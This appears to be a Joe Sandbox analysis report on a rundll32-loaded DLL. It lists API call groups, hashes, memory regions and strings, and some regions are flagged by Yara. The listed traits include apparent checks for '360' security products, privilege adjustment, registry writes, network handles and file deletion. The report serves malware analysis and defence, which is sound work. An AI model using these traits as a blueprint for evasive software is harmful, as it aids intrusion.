                                                                                    • CharNextW.USER32(?,?,00000000,00000000,0000000180009076,?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A), ref: 000000018000855D
                                                                                    • RegSetValueExW.ADVAPI32(?,?,00000000,00000000,0000000180009076,?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A), ref: 00000001800085C2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: CharNext$lstrcmpi$Value
                                                                                    • String ID:
                                                                                    • API String ID: 3520330261-0
                                                                                    • Opcode ID: e6b0475dc37a1ccc9b5f93fb3a52cf7f5178555000e54cf4b197682acd1df91f
                                                                                    • Instruction ID: 54a0f5542f62afcd6411b2081a4c08be2fbbe8d603b0a409542dd15f8ed12d0a
                                                                                    • Opcode Fuzzy Hash: e6b0475dc37a1ccc9b5f93fb3a52cf7f5178555000e54cf4b197682acd1df91f
                                                                                    • Instruction Fuzzy Hash: D3D1643260864982FBA2DB15E8543DA76E1FB9C7D0F91C121BA99476E4EF38C74DD700
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wtoi$Value$??3@memset
                                                                                    • String ID: %d|%d|%d|%d$MontiorInfo$MsgCenter
                                                                                    • API String ID: 1219333133-3184008533
                                                                                    • Opcode ID: 5a13214d90345a148425d7b4cec5787b2bbb9191422684e28f36f8c5be619ee2
                                                                                    • Instruction ID: 3a97e8b4d36ab7b0ff62b7c8c746816c118d75ce1dcaba847e92933311b9e76e
                                                                                    • Opcode Fuzzy Hash: 5a13214d90345a148425d7b4cec5787b2bbb9191422684e28f36f8c5be619ee2
                                                                                    • Instruction Fuzzy Hash: FDC1B472604B4887EB51CF29E84039E77A1F789BA4F208216FAAD577A4DF78D644CB00
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: Version$AddressHandleModuleProcValueatoimemset
                                                                                    • String ID: CurrentVersion$RtlGetVersion$SOFTWARE\Microsoft\Windows NT\CurrentVersion$ntdll.dll
                                                                                    • API String ID: 1009632096-1820686997
                                                                                    • Opcode ID: 96873d62ae8b00b27b2edc00cc4e017e8c26c7791766384428e26c81b31d8715
                                                                                    • Instruction ID: 603b8f84a57364ab934b969a098bbde4f8155cf87e7eb2653b8acdc6aa15b94a
                                                                                    • Opcode Fuzzy Hash: 96873d62ae8b00b27b2edc00cc4e017e8c26c7791766384428e26c81b31d8715
                                                                                    • Instruction Fuzzy Hash: 0F416D31615A498AF792CF20EC883DB77A0F78C7A5F918115F56A426A8DF3CD24CCB00
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2113159787.0000026387CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000026387CF0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_26387cf0000_rundll32.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: wsprintf$AdaptersInfo$AllocateMemoryVirtual
                                                                                    • String ID: o
                                                                                    • API String ID: 2074107575-252678980
                                                                                    • Opcode ID: 78c1bf18890002bbd55230ae8bdd6788f42dae7e011ee9be3a01caf660352b1c
                                                                                    • Instruction ID: 60bbc4320509b6a1614f3984f6b0e8286b535ddb9e372a02398c60a06f6daeec
                                                                                    • Opcode Fuzzy Hash: 78c1bf18890002bbd55230ae8bdd6788f42dae7e011ee9be3a01caf660352b1c
                                                                                    • Instruction Fuzzy Hash: 9BB1E932609B8096EB60CB15E49839EB7F2F788784F501125FA8E83B69DF7DC645CB00
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: ??3@CriticalSectionString$??2@AllocAttributesEnterFileFreeLeavememmove
                                                                                    • String ID: 360util
                                                                                    • API String ID: 2488163691-2294763832
                                                                                    • Opcode ID: 04b2a6e28f52e73c8fb9b448fab7648155792c5097cb6c97d153a05ebb3aa3d7
                                                                                    • Instruction ID: 9938724ed40c23cc8900e9648d175c046ed33f6fe674e618e7d9782a5817fc1c
                                                                                    • Opcode Fuzzy Hash: 04b2a6e28f52e73c8fb9b448fab7648155792c5097cb6c97d153a05ebb3aa3d7
                                                                                    • Instruction Fuzzy Hash: AE029C73B01B488AEB91CB64D8443DD33A6FB48798F519226EE592BB94DF38C619C344
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterPresentProcessUnhandled$CaptureContextCurrentDebuggerEntryFeatureFunctionLookupProcessorTerminateUnwindVirtualmemset
                                                                                    • String ID:
                                                                                    • API String ID: 2775880128-0
                                                                                    • Opcode ID: 720e268603e6e9f10860910523c2ba7112bd240762bfe9a634b271c2e63346d6
                                                                                    • Instruction ID: 97518c6b28749f0b1885d3d6b1dd33bd68934808d59c248e1302251445d11ba7
                                                                                    • Opcode Fuzzy Hash: 720e268603e6e9f10860910523c2ba7112bd240762bfe9a634b271c2e63346d6
                                                                                    • Instruction Fuzzy Hash: 1E413032A14B858AE751CF60EC503ED7360F799788F119229EA9D46B69EF78C398C700
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$CloseCurrentErrorHandleLastOpenToken$AdjustLookupPrivilegePrivilegesValue
                                                                                    • String ID:
                                                                                    • API String ID: 2007143780-0
                                                                                    • Opcode ID: 6a90cf9bb053f436ae0415ad8c3242d222e7ab952c09d034660e141397cb4a9e
                                                                                    • Instruction ID: d46f0c18e1a39d64aeb05f722a7361000aff992e322ccff9c5dcc36b437ee35a
                                                                                    • Opcode Fuzzy Hash: 6a90cf9bb053f436ae0415ad8c3242d222e7ab952c09d034660e141397cb4a9e
                                                                                    • Instruction Fuzzy Hash: 2E218032604B4982EB919F61E8583DA63A1FB8CBD5F458035FA9E47B64DF3CC6498B04
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$??3@CountEnterLeaveTickmemmove
                                                                                    • String ID:
                                                                                    • API String ID: 1944083165-0
                                                                                    • Opcode ID: e7dc1351d672686ce6982c514aa1efe126a088afe47b95bc729bfb6aef2c92dc
                                                                                    • Instruction ID: f41da155b52ef09f3583e4d9bfd8bf17b476c2db053c24b9ffbabfba65fc2eed
                                                                                    • Opcode Fuzzy Hash: e7dc1351d672686ce6982c514aa1efe126a088afe47b95bc729bfb6aef2c92dc
                                                                                    • Instruction Fuzzy Hash: 37E15932B01F449AEB92CFA1E8403DD33B6F748798F148125EE5967B98DE34C65AD344
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: _swprintf_c_l$ErrorFileLastSizemallocmemset
                                                                                    • String ID: INIT
                                                                                    • API String ID: 2772675779-4041279936
                                                                                    • Opcode ID: 91801e61f8e34b5680577b6ef1157ad949fcf405e34d1d65f93b8e184a0d9fad
                                                                                    • Instruction ID: 738f7e56dffb12879fa424a41098a8b7db62e01a67729e30f645ff56db629163
                                                                                    • Opcode Fuzzy Hash: 91801e61f8e34b5680577b6ef1157ad949fcf405e34d1d65f93b8e184a0d9fad
                                                                                    • Instruction Fuzzy Hash: 31E192727043588BF7A6EB6598507EA77A6F70D7C8F54C029AE5A43B86DF34C608CB10
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,00000000,00000000,00000040,?,0000000180013F90), ref: 0000000180010BE9
                                                                                    • RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,00000000,00000000,00000040,?,0000000180013F90), ref: 0000000180010C46
                                                                                    • memmove.MSVCRT(?,?,?,?,?,?,?,?,00000000,00000000,00000040,?,0000000180013F90), ref: 0000000180010D0F
                                                                                    • ??_V@YAXPEAX@Z.MSVCRT ref: 0000000180010D31
                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,00000000,00000000,00000040,?,0000000180013F90), ref: 0000000180010D3B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseOpenQueryValuememmove
                                                                                    • String ID: 360scan
                                                                                    • API String ID: 1121107697-2450673717
                                                                                    • Opcode ID: 220e67dd3970d468599f7a797be11ec42a8334a823f280886d40bb2abff1120a
                                                                                    • Instruction ID: 8412be06b917c2556790a81d519247f335b1f81f587c3bd72331bc97ccab05af
                                                                                    • Opcode Fuzzy Hash: 220e67dd3970d468599f7a797be11ec42a8334a823f280886d40bb2abff1120a
                                                                                    • Instruction Fuzzy Hash: B551F336700A4889FBA6CBB5E8107ED3760BB487E8F548215EEA917B95DF74C649C700
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionThrow$??3@
                                                                                    • String ID:
                                                                                    • API String ID: 3542664073-0
                                                                                    • Opcode ID: 4077b6000bdbe81cdcb22badff92ad6060c6f4ec82431c923b1cffb770fd83d1
                                                                                    • Instruction ID: f77bb453ddad34bb426a0367fc3509630a9405fc871705a0e6efaa82900c553f
                                                                                    • Opcode Fuzzy Hash: 4077b6000bdbe81cdcb22badff92ad6060c6f4ec82431c923b1cffb770fd83d1
                                                                                    • Instruction Fuzzy Hash: 35216A72B00A88C9E75DFE33B8423EB6212ABD87C0F18D435BA594B69BDE25C5168740
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2113159787.0000026387CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000026387CF0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_26387cf0000_rundll32.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseFileInitOpenStringUnicode
                                                                                    • String ID: $0$@
                                                                                    • API String ID: 3719522541-2347541974
                                                                                    • Opcode ID: 569bf1d9c0e4b42045824f196861e1bccdac350dc9b2e721c941129060653f3b
                                                                                    • Instruction ID: 8bafd6db8320c150fc14a49e2f4a066bfc590faaecb45934785e02cab1590a27
                                                                                    • Opcode Fuzzy Hash: 569bf1d9c0e4b42045824f196861e1bccdac350dc9b2e721c941129060653f3b
                                                                                    • Instruction Fuzzy Hash: 9101D772118A8096E750DF10E4583DFBB71F3C5794F901015F28A83AA9DB7ECA9ACF40
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0000000180066CBF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugDebuggerErrorLastOutputPresentStringmemset
                                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                    • API String ID: 1848478996-631824599
                                                                                    • Opcode ID: 9f3b69b346ce0167d1f9eabdb45a87455ea8902d3636c2fa194e63da2080b7c6
                                                                                    • Instruction ID: 5420fd47393a03a9017ccb442b178d5ad27f9d1acba3036b184651f5d30fce96
                                                                                    • Opcode Fuzzy Hash: 9f3b69b346ce0167d1f9eabdb45a87455ea8902d3636c2fa194e63da2080b7c6
                                                                                    • Instruction Fuzzy Hash: FC117032710B4997F7869B22EE453E932A1FB58395F50C125E75982AA0EF3CD67CC710
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2113159787.0000026387CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000026387CF0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_26387cf0000_rundll32.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Internet$CloseHandleOpen
                                                                                    • String ID:
                                                                                    • API String ID: 435140893-0
                                                                                    • Opcode ID: 1ae38b70c00e5fa2b0baae9672864dfc4ebc490b6e9ea35561f34b789a8602ec
                                                                                    • Instruction ID: 2569d722e8785f995d7772cf8dbd25a29f72eb866049e6f5073778193d6f88b2
                                                                                    • Opcode Fuzzy Hash: 1ae38b70c00e5fa2b0baae9672864dfc4ebc490b6e9ea35561f34b789a8602ec
                                                                                    • Instruction Fuzzy Hash: 4E41D576619A8087E7A0CB15F49875EB3B2F3C5784F105015FB8A83B99CFBEC9458B04
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionThrow
                                                                                    • String ID:
                                                                                    • API String ID: 432778473-0
                                                                                    • Opcode ID: 51705d7ffc1c5a9faf17d18654f459016f05baa871bea5d42b40ed88e15a0c9d
                                                                                    • Instruction ID: 0cc55a271704fcaf4879220f63c9cc24c35a4ef39e1216f676686ee34d186413
                                                                                    • Opcode Fuzzy Hash: 51705d7ffc1c5a9faf17d18654f459016f05baa871bea5d42b40ed88e15a0c9d
                                                                                    • Instruction Fuzzy Hash: CE118471714A88C9E75EFE33A8027EB5312ABDC7C0F14D434B9894B65BCF25C6164300
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2113159787.0000026387CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000026387CF0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_26387cf0000_rundll32.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: DeleteFileInitStringUnicode
                                                                                    • String ID: 0$@
                                                                                    • API String ID: 3559453722-1545510068
                                                                                    • Opcode ID: b6164af5c4588a1862d81e9109c65e2a6067d28343454251f55d6c9ee728859c
                                                                                    • Instruction ID: 619154152d32f4e402b42bb1a5c27772efb55397dc619e72cd07231d2eefca4a
                                                                                    • Opcode Fuzzy Hash: b6164af5c4588a1862d81e9109c65e2a6067d28343454251f55d6c9ee728859c
                                                                                    • Instruction Fuzzy Hash: FCF01772618A8196D720DF00E45838FBB74F780388FA00115F28E47A69DB7DC66ACF00
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2113159787.0000026387CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000026387CF0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_26387cf0000_rundll32.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Find$File$AllocateCloseFirstMemoryNextVirtualwsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 65906682-0
                                                                                    • Opcode ID: 7544d8a013f7abd9b84a5d7f403609ff286104f35a45eb63b3216f6701f46496
                                                                                    • Instruction ID: a4cd7479feefd76d1f1e4ceb202730e79b3f01547d81ab206bc341d4ead11cf0
                                                                                    • Opcode Fuzzy Hash: 7544d8a013f7abd9b84a5d7f403609ff286104f35a45eb63b3216f6701f46496
                                                                                    • Instruction Fuzzy Hash: DD512032519B8593EA60DB11E4483DEB776F784384F901125F68D43AAEEFBAC746CB00
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: memmovememset
                                                                                    • String ID:
                                                                                    • API String ID: 1288253900-0
                                                                                    • Opcode ID: 25317eca67bb0a3083e8d95f7975eeecdd6a0a887f58df33bf998c20beef77dc
                                                                                    • Instruction ID: 53b279b989bf8eb66429a88fea8492b1387e1814281b1786c9cbc4725fb6e079
                                                                                    • Opcode Fuzzy Hash: 25317eca67bb0a3083e8d95f7975eeecdd6a0a887f58df33bf998c20beef77dc
                                                                                    • Instruction Fuzzy Hash: 56A1A273A146D48FD795CF79D8407AC7BE1F389788F548126EA9997B48EB38C205CB00
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: ControlDevice
                                                                                    • String ID:
                                                                                    • API String ID: 2352790924-0
                                                                                    • Opcode ID: a66e1d163aca22c0d64387c7a093102cf96f82ef91a8c2df69456084ab1fc6cd
                                                                                    • Instruction ID: 1e54cb40d621f6ee58c2f67f74a10768d1db0efbd2ae079103c51a30650bf8b3
                                                                                    • Opcode Fuzzy Hash: a66e1d163aca22c0d64387c7a093102cf96f82ef91a8c2df69456084ab1fc6cd
                                                                                    • Instruction Fuzzy Hash: 68D04276928B84CBD6A09B18F48430AB7A0F388794F501215EBCD46B29DB3CC2558F04
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
